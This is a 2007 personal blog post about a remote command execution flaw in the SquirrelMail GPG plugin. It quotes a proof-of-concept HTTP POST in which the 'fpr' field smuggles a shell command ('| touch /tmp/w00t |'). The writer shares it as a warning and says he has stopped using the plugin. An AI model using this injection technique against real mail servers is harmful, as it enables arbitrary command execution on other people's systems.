Archives
November 2008
October 2008
September 2008
August 2008
July 2008
June 2008
May 2008
April 2008
March 2008
February 2008
January 2008
December 2007
November 2007
October 2007
September 2007
August 2007
July 2007
June 2007
May 2007
April 2007
March 2007
February 2007
January 2007
December 2006
November 2006
October 2006
September 2006
August 2006
July 2006
June 2006
May 2006
April 2006
March 2006
February 2006
January 2006
Search
| Aromatherapy [44] | [RSS] |
| Bullshit [50] | [RSS] |
| Day to Day [167] | [RSS] |
| Geocaches [4] | [RSS] |
| Projects [10] | [RSS] |
| Software [118] | [RSS] |
| Squirrel Thursday [29] | [RSS] |
| Technology [94] | [RSS] |
MY LINKS OF INTEREST
BLOGS & Friends Pages
Work From Home Smart
Honest Tunes Radio
Mad Geek!!!
Damn Interesting
hecker’s blizzog
EINSTEIN@HOME FreeBSD
Team FreeBSD HOME
Team FreeBSD Stat Page
Join Team FreeBSD
Interesting Web Sites
IPac - Culture & Technology
Cache-A-Maniacs
One Dollar BLOGS
Nature's Gift
Clientcopia
Links Visited Daily
Worse Than Failure
Forever Geek
Neatorama
Engadget
Boing Boing
Gizmodo
Hack a Day
My Content and Media
Myside's Geocaching Stats
My Shared RSS Snippets
A Picture of Me
My last.fm Home
Geeky, Funny, Strange
Wish List
Casio Wave Ceptor Watch
Nokia N800 Internet Tablet
Syndicate
Projects of Interest
5 Person Chat if I am On-Line - give me a shout!
If I am on-line and you want to chat in real time, or if I am off-line and you want to leave a message with my local IM program, allow pop-ups, then :::
Squirrelmail GPG Plugin Remote Command Execution Vulnerability
08 August, 2007 08:16
Leave it to the beavers when after I get my GPG plugin working with Squirrelmail, I find this notice of a remote command execution vulnerability.
The culprit is /plugins/gpg/modules/keyring_main.php which doesn't properly sanitize the $fpr POST data.
Here is a proof of concept from the originating article:
testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#
***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
id=C5B1611B8E71C***\
&fpr= | touch /tmp/w00t |&pos=0&sort=email_name&desc=&srch=&ring=all\
&passphrase=&deletekey=true\
amp;deletepair=false&trust=1
It is also mentioned that there are several other vulnerabilities in the plugin. I hope a developer steps up and does what needs to be done to release a stable version of this well needed and rather easy to use plugin.
Version 2.1 was released July 7th, 2007 and the exploit from what I have read dates around July 11th, 2007
I would try to sanitize the sting myself, or find a work around, but there are mentions of other vulnerabilities which makes me too cautious to continue using, or patching the plugin until there is another stable release.
[Software][Comments(0)] [Trackbacks(0)] [Permalink]
Add comment
Main Entry: spew
Function: verb
Etymology: Middle English, from Old English spIwan; akin to Old High German spIwan to spit, Latin spuere, Greek ptyein
intransitive verb
1 : VOMIT
2 : to come forth in a flood or gush
3 : to ooze out as if under pressure : EXUDE
transitive verb
1 : VOMIT
2 : to send or cast forth with vigor or violence or in great quantity -- often used with out
- spew-er noun
-- Merriam-Webster